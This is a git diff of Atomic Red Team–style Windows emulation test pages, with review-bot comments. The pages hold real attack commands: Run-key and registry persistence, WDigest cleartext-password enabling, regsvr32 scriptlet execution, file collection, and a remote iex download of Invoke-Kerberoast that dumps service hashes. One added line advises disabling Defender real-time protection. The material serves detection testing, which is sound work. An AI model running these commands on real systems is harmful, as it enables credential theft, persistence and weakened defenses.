+- [Atomic Test #4 - Add domain to Trusted sites Zone](#atomic-test-4---add-domain-to-trusted-sites-zone)
-- [Atomic Test #5 - Modify registry to store PowerShell code](#atomic-test-5---modify-registry-to-store-powershell-code)
-
-- [Atomic Test #6 - Add domain to Trusted sites Zone](#atomic-test-6---add-domain-to-trusted-sites-zone)
-
-- [Atomic Test #7 - Javascript in registry](#atomic-test-7---javascript-in-registry)
+- [Atomic Test #5 - Javascript in registry](#atomic-test-5---javascript-in-registry)
## Atomic Test #1 - Modify Registry of Current User Profile - cmd
-Modify the registry of the currently logged in user using reg.exe cia cmd console
+Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
+will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
**Supported Platforms:** Windows
@@ -57,19 +54,25 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
## Atomic Test #2 - Modify Registry of Local Machine - cmd
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
-CMD is ran as Administrative rights.
+CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
+will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe|
+
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
-reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
+reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
```
#### Cleanup Commands:
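Review bot: The added description for Test #2 sends the reader to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, but the attack command writes to `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run` (which is why elevation is required); change the description to HKLM. "CMD is ran as Administrative rights" should read "cmd is run with administrative rights".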
@@ -84,83 +87,10 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
-## Atomic Test #3 - Modify Registry of Another User Profile
-Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-
-```powershell
-# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
-# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
-$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
-
-Write-Verbose -Message 'Gathering Profile List and loading their registry hives'
-# Get Username, SID, and location of ntuser.dat for all users
-
-$ProfileList = @()
-$ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } |
- Select @{ name = "SID"; expression = { $_.PSChildName } },
- @{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } },
- @{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } }
-
-# Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded)
-$LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } }
-
-$SIDObject = @()
-
-foreach ($item in $LoadedHives)
-{
- $props = @{
- SID = $item.SID
- }
-
- $TempSIDObject = New-Object -TypeName PSCustomObject -Property $props
- $SIDObject += $TempSIDObject
-}
-
-# We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2
-# if the count is less than 2 it doesn't work. :)
-for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++)
-{
- for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++)
- {
- if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID))
- {
- $UnloadedHives += $ProfileList[$p].SID
- Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)"
- reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)"
-
- Write-Verbose -Message 'Attempting to modify registry keys for each profile'
- #####################################################################
- reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f
- }
- }
-}
-
-Write-Verbose 'Unloading Registry hives for all users'
-# Unload ntuser.dat
-### Garbage collection and closing of ntuser.dat ###
-[gc]::Collect()
-reg unload "HKU\$($ProfileList[$p].SID)"
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #4 - Modify registry to store logon credentials
-Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
+## Atomic Test #3 - Modify registry to store logon credentials
+Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+Upon execution, the message "The operation completed successfully." will be displayed.
+Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
**Supported Platforms:** Windows
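Review bot: This hunk deletes "Modify Registry of Another User Profile" (the `reg load` / `reg unload` walk over unloaded ntuser.dat hives) outright instead of repairing it, so editing offline user hives no longer has any trigger on this page; if the removal is deliberate, say so in the change description, otherwise the script only needed small fixes: it writes to `HKEY_CURRENT_USER\$($ProfileList[$p].SID)\...` after loading the hive under `HKU\$($ProfileList[$p].SID)`, `$UnloadedHives` is appended to but never initialised, and the single `reg unload` runs after the loop with `$p` already past the end of `$ProfileList`, leaving every loaded hive mounted. The renumbered Test #3 text is fine.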
@@ -187,8 +117,12 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
-## Atomic Test #5 - Modify registry to store PowerShell code
-Sets Windows Registry key containing base64-encoded PowerShell code.
+## Atomic Test #4 - Add domain to Trusted sites Zone
+Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
+Upon execution, details of the new registry entries will be displayed.
+Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
+
+https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** Windows
@@ -198,49 +132,14 @@ Sets Windows Registry key containing base64-encoded PowerShell code.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
-| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion|
-| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
+| bad_domain | Domain to add to trusted site zone | String | bad-domain.com|
#### Attack Commands: Run with `powershell`!
```powershell
-$OriginalCommand = '#{powershell_command}'
-$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
-$EncodedCommand =[Convert]::ToBase64String($Bytes)
-$EncodedCommand
-Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore
-```
-
-
-
-
-
-
-
-
-## Atomic Test #6 - Add domain to Trusted sites Zone
-Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
-https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!
-
-
-```powershell
-$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
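Review bot: Removing Test #5 (base64-encoded PowerShell stored in a registry value) drops the only trigger for "store code in the registry" while the Javascript-in-registry test survives; either keep it under a new number or state the removal. In the surviving Trusted Sites test only the domain became an input (`#{bad_domain}`) while `$name ="bad-subdomain"` stays hardcoded, and the new input's type is written `String` where the other input tables added in this change use `string`.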
@@ -250,7 +149,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
#### Cleanup Commands:
```powershell
-$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
Remove-item $key -Recurse -ErrorAction Ignore
```
@@ -261,8 +160,9 @@ Remove-item $key -Recurse -ErrorAction Ignore
-## Atomic Test #7 - Javascript in registry
-Upon execution, a javascript block will be placed in the registry for persistence
+## Atomic Test #5 - Javascript in registry
+Upon execution, a javascript block will be placed in the registry for persistence.
+Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1117.md b/Atomic_Threat_Coverage/Triggers/T1117.md
index f45e171..0568b74 100644
--- a/Atomic_Threat_Coverage/Triggers/T1117.md
+++ b/Atomic_Threat_Coverage/Triggers/T1117.md
@@ -20,7 +20,7 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish Pe
## Atomic Test #1 - Regsvr32 local COM scriptlet execution
-Regsvr32.exe is a command-line program used to register and unregister OLE controls
+Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@@ -62,7 +62,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
-Regsvr32.exe is a command-line program used to register and unregister OLE controls
+Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
+windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
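Review bot: "disable windows defender real-time protection to fix it" in the added description tells the operator to work around a block that is itself a valid outcome of a detection exercise; phrase it as "Windows Defender may block this test; if so, record the block as a detection" and leave disabling real-time protection as an explicit, recorded decision rather than a fix. "windows defender" should also be capitalised.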
@@ -91,7 +92,7 @@ regsvr32.exe /s /u /i:#{url} scrobj.dll
## Atomic Test #3 - Regsvr32 local DLL execution
-Regsvr32.exe is a command-line program used to register and unregister OLE controls
+Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1119.md b/Atomic_Threat_Coverage/Triggers/T1119.md
index b96e40b..0f7ddc1 100644
--- a/Atomic_Threat_Coverage/Triggers/T1119.md
+++ b/Atomic_Threat_Coverage/Triggers/T1119.md
@@ -18,7 +18,8 @@ This technique may incorporate use of other techniques such as [File and Directo
## Atomic Test #1 - Automated Collection Command Prompt
-Automated Collection
+Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
+to see what was collected.
**Supported Platforms:** Windows
@@ -30,10 +31,15 @@ Automated Collection
```cmd
+mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
dir c: /b /s .docx | findstr /e .docx
-for /R c: %f in (*.docx) do copy %f c:\temp\
+for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
```
+#### Cleanup Commands:
+```cmd
+del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
+```
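Review bot: The new cleanup command `del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1` has two defects: `>null` redirects to a file literally named `null` in the current directory (the device is `nul`, as the `mkdir` line above correctly uses), and `del` on a directory removes the copied files but leaves the directory itself, so the check described in the test text still finds the folder after cleanup. Use `rmdir /s /q %temp%\T1119_command_prompt_collection >nul 2>&1`.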
@@ -43,7 +49,8 @@ for /R c: %f in (*.docx) do copy %f c:\temp\
## Atomic Test #2 - Automated Collection PowerShell
-Automated Collection
+Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
+to see what was collected.
**Supported Platforms:** Windows
@@ -55,9 +62,14 @@ Automated Collection
```powershell
-Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
+New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
+Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
```
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\T1119_powershell_collection -Force | Out-Null
+```
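Review bot: `Remove-Item $env:TEMP\T1119_powershell_collection -Force` without `-Recurse` on a directory that now contains copied files prompts for confirmation in an interactive session and fails otherwise, so cleanup does not complete; add `-Recurse`. Separately, `Get-ChildItem -Recurse -Include *.doc` with no `-Path` only searches below the current directory and `*.doc` does not match `.docx`, so this test collects much less than the cmd variant does from `c:`; use `-Path C:\ -Include *.doc,*.docx` if parity between the two tests is intended.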
@@ -67,7 +79,8 @@ Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:
## Atomic Test #3 - Recon information for export with PowerShell
-collect information for exfiltration
+collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
+to see what was collected.
**Supported Platforms:** Windows
@@ -99,7 +112,8 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
## Atomic Test #4 - Recon information for export with Command Prompt
-collect information for exfiltration
+collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
+to see what was collected.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1121.md b/Atomic_Threat_Coverage/Triggers/T1121.md
index 799f5ed..6a39a73 100644
--- a/Atomic_Threat_Coverage/Triggers/T1121.md
+++ b/Atomic_Threat_Coverage/Triggers/T1121.md
@@ -14,7 +14,7 @@ Adversaries can use Regsvcs and Regasm to proxy execution of code through a trus
## Atomic Test #1 - Regasm Uninstall Method Call Test
-Executes the Uninstall Method, No Admin Rights Required
+Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed.
**Supported Platforms:** Windows
@@ -62,7 +62,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvs Uninstall Method Call Test
-Executes the Uninstall Method, No Admin Rights Required, Requires SNK
+Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
+along with other information about the assembly being installed.
**Supported Platforms:** Windows
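Review bot: "Regsvs" in the Test #2 heading (unchanged context) should be "Regsvcs", matching the tool named in the technique description above; worth fixing while the description line is being edited.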
diff --git a/Atomic_Threat_Coverage/Triggers/T1124.md b/Atomic_Threat_Coverage/Triggers/T1124.md
index 2ebf74b..d21eddd 100644
--- a/Atomic_Threat_Coverage/Triggers/T1124.md
+++ b/Atomic_Threat_Coverage/Triggers/T1124.md
@@ -14,7 +14,7 @@ An adversary may gather the system time and/or time zone from a local or remote
## Atomic Test #1 - System Time Discovery
-Identify the system time
+Identify the system time. Upon execution, the local computer system time and timezone will be displayed.
**Supported Platforms:** Windows
@@ -44,7 +44,7 @@ w32tm /tz
## Atomic Test #2 - System Time Discovery - PowerShell
-Identify the system time via PowerShell
+Identify the system time via PowerShell. Upon execution, the system time will be displayed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1136.md b/Atomic_Threat_Coverage/Triggers/T1136.md
index 8ed767c..6fbd5f7 100644
--- a/Atomic_Threat_Coverage/Triggers/T1136.md
+++ b/Atomic_Threat_Coverage/Triggers/T1136.md
@@ -100,7 +100,8 @@ dscl . -delete /Users/#{username}
## Atomic Test #3 - Create a new user in a command prompt
-Creates a new user in a command prompt
+Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the
+new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_CMD"
**Supported Platforms:** Windows
@@ -134,7 +135,8 @@ net user /del "#{username}"
## Atomic Test #4 - Create a new user in PowerShell
-Creates a new user in PowerShell
+Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the
+new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_PowerShell"
**Supported Platforms:** Windows
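Review bot: The added verification text hardcodes the account names "T1136_CMD" and "T1136_PowerShell", but the cleanup line in the hunk context (`net user /del "#{username}"`) shows the username is an input; reference `#{username}` so the text stays correct when the input is overridden. "powershell" should be "PowerShell" for consistency with the heading.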
diff --git a/Atomic_Threat_Coverage/Triggers/T1138.md b/Atomic_Threat_Coverage/Triggers/T1138.md
index 4fd1c68..5178276 100644
--- a/Atomic_Threat_Coverage/Triggers/T1138.md
+++ b/Atomic_Threat_Coverage/Triggers/T1138.md
@@ -26,11 +26,8 @@ To keep shims secure, Windows designed them to run in user mode so they cannot m
## Atomic Test #1 - Application Shim Installation
-To test injecting DLL into a custom application
-you need to copy AtomicShim.dll Into C:\Tools
-As well as Compile the custom app.
-We believe observing the shim install is a good
-place to start.
+Install a shim database. This technique is used for privelage escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete."
+will be displayed.
**Supported Platforms:** Windows
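Review bot: "privelage escalation" should be "privilege escalation", and "bypassing user access control" should name the feature: User Account Control (UAC). The rewritten description also drops the old note that AtomicShim.dll has to be in C:\Tools and the custom app compiled; if those prerequisites are now covered by the Dependencies section that is fine, otherwise keep them in the description.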
@@ -48,9 +45,12 @@ place to start.
```cmd
sdbinst.exe #{file_path}
-sdbinst.exe -u #{file_path}
```
+#### Cleanup Commands:
+```cmd
+sdbinst.exe -u #{file_path}
+```
@@ -73,6 +73,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - New shim database files created in the default shim database directory
+Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
+
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
**Supported Platforms:** Windows
@@ -103,6 +105,9 @@ Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAc
## Atomic Test #3 - Registry key creation and/or modification events for SDB
+Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
+the registry keys that were created. These keys can also be viewed using the Registry Editor.
+
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1158.md b/Atomic_Threat_Coverage/Triggers/T1158.md
index 5367ea8..9829931 100644
--- a/Atomic_Threat_Coverage/Triggers/T1158.md
+++ b/Atomic_Threat_Coverage/Triggers/T1158.md
@@ -94,58 +94,92 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
## Atomic Test #3 - Create Windows System File with Attrib
-Creates a file and marks it as a system file using the attrib.exe utility.
+Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
+and observe that the Attributes are "SA" for System and Archive.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_modify | File to modify using Attrib command | string | %temp%\T1158.txt|
+
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
-echo T1158 > %TEMP%\T1158.txt
-attrib.exe +s %TEMP%\T1158.txt
+attrib.exe +s #{file_to_modify}
```
#### Cleanup Commands:
```cmd
-del /A:S %TEMP%\T1158.txt >nul 2>&1
+del /A:S #{file_to_modify} >nul 2>&1
```
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file must exist on disk at specified location (#{file_to_modify})
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+echo system_Attrib_T1158 >> #{file_to_modify}
+```
+
+
## Atomic Test #4 - Create Windows Hidden File with Attrib
-Creates a file and marks it as hidden using the attrib.exe utility.
+Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
+and observe that the Attributes are "SH" for System and Hidden.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_modify | File to modify using Attrib command | string | %temp%\T1158.txt|
-#### Attack Commands: Run with `command_prompt`!
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
-echo T1158_hidden > %TEMP%\T1158_hidden.txt
-attrib.exe +h %TEMP%\T1158_hidden.txt
+attrib.exe +h #{file_to_modify}
```
#### Cleanup Commands:
```cmd
-del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
+del /A:H #{file_to_modify} >nul 2>&1
```
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file must exist on disk at specified location (#{file_to_modify})
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+echo system_Attrib_T1158 >> #{file_to_modify}
+```
+
+
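Review bot: Test #4's added verification text says the attributes will be "SH" for System and Hidden, but its command only runs `attrib.exe +h`, so on a fresh file the reader will see Hidden (plus Archive), not System; it would only show "SH" if Test #3 had already run `+s` on the same default file, which both tests now share (`%temp%\T1158.txt`). Either give Test #4 its own default (the pre-change `%TEMP%\T1158_hidden.txt`) or describe the attribute as "H". Also: "utility.Upon" is missing a space, "File Epxplorer" should be "File Explorer", and "Elevation Required" was added to Test #4 although `attrib +h` on a file in the user's own %temp% needs no elevation.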
@@ -238,7 +272,8 @@ defaults write com.apple.finder AppleShowAllFiles NO
## Atomic Test #8 - Create ADS command prompt
-Create an Alternate Data Stream with the command prompt. Write access is required.
+Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
+folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt"
**Supported Platforms:** Windows
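Review bot: The verification command in the added text nests double quotes (`"dir /a-d /s /r | find ":$DATA""`), which a reader cannot paste as written; put the whole command in backticks so the inner quotes survive.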
@@ -248,7 +283,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_name | File name of file to create ADS on. | string | test.txt|
+| file_name | File name of file to create ADS on. | string | %temp%\T1158_has_ads_cmd.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
@@ -256,7 +291,6 @@ Create an Alternate Data Stream with the command prompt. Write access is require
```cmd
-echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
```
@@ -268,13 +302,26 @@ del #{file_name} >nul 2>&1
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file must exist on disk at specified location (#{file_name})
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+echo normal_text >> #{file_name} >nul 2>&1
+```
+
+
## Atomic Test #9 - Create ADS PowerShell
-Create an Alternate Data Stream with PowerShell. Write access is required.
+Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
+in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
**Supported Platforms:** Windows
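Review bot: In the Get Prereq command `echo normal_text >> #{file_name} >nul 2>&1`, stdout is redirected twice; cmd applies the later `>nul`, so the file is created but stays empty. Drop the `>nul` as the equivalent Test #3/#4 prereq (`echo system_Attrib_T1158 >> #{file_to_modify}`) does. In the Test #9 description, "To verify execution, the the command ..." is missing its verb ("run the command") and duplicates "the", and "direcotry" should be "directory".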
@@ -284,7 +331,7 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_name | File name of file to create ADS on. | string | test.txt|
+| file_name | File name of file to create ADS on. | string | $env:TEMP\T1158_has_ads_powershell.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
@@ -295,7 +342,6 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
set-content -path . -stream #{ads_filename} -value "test3"
-ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
```
#### Cleanup Commands:
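Review bot: The unchanged first attack line, `echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"`, still writes its stream onto a literal `test.txt`, which no longer matches the new default `$env:TEMP\T1158_has_ads_powershell.txt` introduced by this hunk; replace the literal with `#{file_name}`. The `echo ... > file | set-content` pipe also sends nothing to `set-content` (the redirection consumes the output), so the two halves should be separate statements.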
@@ -305,6 +351,18 @@ Remove-Item -Path #{file_name} -ErrorAction Ignore
+#### Dependencies: Run with `powershell`!
+##### Description: The file must exist on disk at specified location (#{file_name})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_name} | Out-Null
+```
+
+
diff --git a/Atomic_Threat_Coverage/Triggers/T1208.md b/Atomic_Threat_Coverage/Triggers/T1208.md
index 968d8d4..fcaded5 100644
--- a/Atomic_Threat_Coverage/Triggers/T1208.md
+++ b/Atomic_Threat_Coverage/Triggers/T1208.md
@@ -21,6 +21,8 @@ This test uses the Powershell Empire Module: https://github.com/EmpireProject/Em
The following are further sources and credits for this attack:
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
+when executed successfully , the test displays available services with their hashes.
+If the testing domain doesn't have any service principal name configured, there is no output
**Supported Platforms:** Windows
@@ -32,7 +34,7 @@ The following are further sources and credits for this attack:
```powershell
-Import-Module .\Invoke-Kerberoast.ps1
+iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1)
Invoke-Kerberoast | fl
```
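Review bot: `iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/...)` executes whatever is at `master` at run time, so the test's behaviour can change or break without any change in this repo and it no longer works offline; the rest of this change uses the Dependencies pattern (`Invoke-WebRequest ... -OutFile` in Get Prereq, then a local import), so pin a commit hash in the URL, move the download into Get Prereq and keep `Import-Module` of the local file as the attack command. The added text "when executed successfully , the test" also needs the stray space before the comma removed and an initial capital.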
diff --git a/Atomic_Threat_Coverage/Triggers/T1218.md b/Atomic_Threat_Coverage/Triggers/T1218.md
index ddaac82..3d1d809 100644
--- a/Atomic_Threat_Coverage/Triggers/T1218.md
+++ b/Atomic_Threat_Coverage/Triggers/T1218.md
@@ -232,6 +232,8 @@ msiexec.exe /q /i "#{msi_payload}"
## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL
Execute arbitrary DLL file stored locally. Commonly seen in application installation.
+Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
+By default, if the src folder is not in place, it will download the 64 bit version.
**Supported Platforms:** Windows
@@ -241,7 +243,7 @@ Execute arbitrary DLL file stored locally. Commonly seen in application installa
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll|
+| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll|
#### Attack Commands: Run with `command_prompt`!
@@ -255,7 +257,7 @@ msiexec.exe /y "#{dll_payload}"
#### Dependencies: Run with `powershell`!
-##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
+##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
@@ -263,7 +265,7 @@ if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1220.md b/Atomic_Threat_Coverage/Triggers/T1220.md
index aca6395..37e6986 100644
--- a/Atomic_Threat_Coverage/Triggers/T1220.md
+++ b/Atomic_Threat_Coverage/Triggers/T1220.md
